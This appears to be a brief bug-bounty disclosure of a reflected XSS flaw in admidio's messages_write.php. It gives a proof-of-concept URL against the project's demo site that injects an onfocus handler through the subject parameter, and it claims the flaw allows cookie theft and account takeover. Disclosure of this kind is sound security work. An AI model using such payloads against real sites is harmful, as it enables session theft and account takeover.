Cross-site Scripting (XSS) - Reflected in admidio/admidio
Oct 18th 2021
Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites.
Proof of Concept
// PoC.js Vuln Link --> https://www.admidio.org/demo_en/adm_program/modules/messages/messages_write.php?rol_id=1&subject=Login%20problems+xss%22%20autofocus/onfocus=%22alert(3)%22%20
This vulnerability is capable of claiming other users cookie performing other advanced scenarios . Account takeover is possible in this case .